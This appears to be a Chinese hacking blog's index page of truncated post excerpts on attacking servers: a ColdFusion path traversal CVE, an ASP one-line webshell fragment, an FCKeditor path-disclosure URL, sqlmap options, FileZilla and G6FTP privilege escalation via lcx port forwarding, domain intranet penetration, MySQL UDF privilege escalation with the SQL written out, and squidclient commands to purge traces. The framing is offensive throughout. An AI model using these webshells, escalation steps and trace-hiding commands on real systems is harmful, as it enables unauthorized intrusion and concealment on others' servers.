天黑再动手

摘要： http://yxmhero1989.blog.163.com/blog/static/1121579562014120104439831/ 阅读全文

摘要： 编号：CVE-2010-2861 APSB10-18‘locale’ Path Traversal Vulnerability detected影响版本：ColdFusion MX6 6.1 base patches ColdFusion MX7 7,0,0,91690 base patches ... 阅读全文

摘要： 现在提权经常会遇到这种情况比如用常见的提权杀器提权的时候会出现can’t find WMI process PID.这个时候怎么办 通常清苦下来讲这个程序是通过wmip~这个进程来实现 获取注册表并覆盖访问那么出现 fuck,can’t find WMI process PID.时我们一般来讲是重启... 阅读全文

摘要： ""thenexecuterequest("cmd")%> 阅读全文

摘要： 报IIS路径http://www.xxx.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=~/ 阅读全文

摘要： Options（选项）：--version 显示程序的版本号并退出-h, --help 显示此帮助消息并退出-v VERBOSE 详细级别：0-6（默认为1）Target（目标）：以下至少需要设置其中一个选项，设置目标URL。-d DIRECT 直接连接到数据库。-u URL, --url=URL 目标URL。-l LIST 从Burp或WebScarab代理的日志中解析目标。-r REQUESTFILE 从一个文件中载入HTTP请求。-g GOOGLEDORK 处理Google dork的结果作为目标URL。-c CONFIGFILE 从INI配置文件中加载选项。Request（请求）：这些 阅读全文

摘要： 前段时间lengf牛写了篇文章关于FileZilla Server的提权测试，俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器，咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢，大家有没有想到G6FTP如何提权的， G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。这个是我复制回来的 服务器的管理信息下面看我今天的演示：本机执行lcx监听lcx2 -listen 51 2001Webshell下上传lcx 转发Lcx –slave 你的ip 端口 要转发的ip 阅读全文

摘要： 假设现在已经拥有一台内网[域]机器，取名X-007. 1-1.内网[域]信息收集 A.本机X-007信息收集. B.扩撒信息收集 如果可能，建议弄一张内网拓扑图，这样方便下面的渗透工作. 1-2.内网[域]渗透 [推荐阅读] 内网[域]渗透，不外乎获取内网[域]最高权限.通常做法就是拿到某个域管理员 阅读全文

摘要： 当默认udf导出失败时，可以尝试用手动方法导出udf进行提权，具体方法如下：先上传udf.dll，连接到mysql，再按下面步骤执行sql语句。 createtablezz(abclongblob);//注意列类型为longblobinsertintozzvalues(load_file('c:/tmp/cmd.txt'));//上传的udf.dll路径selectabcfromzzintodumpfile'C:/ProgramFiles/MySQL/MySQLServer5.1/lib/plugin/sqlmap.log';//导入的目标地址mysql5.0以 阅读全文

摘要： 第一种:本地包含漏洞 你们懂得 不解释修改网站程序代码 - -! 有点淫荡哈第二种:squidclient - -!这个比较淫荡了!方法: //不过需要root权限,对于linux系统权限 呵呵 个人感觉比较容易的//原因很简单,linux管理员技术不够 不然就是 懒！所以悲剧发生了/usr/local/squid/bin/squidclient -m PURGE ' http://127.0.0.1/1.php'/usr/local/squid/bin/squidclient -r ' http://127.0.0.1/1.php'- -！传说中的 查不出 删 阅读全文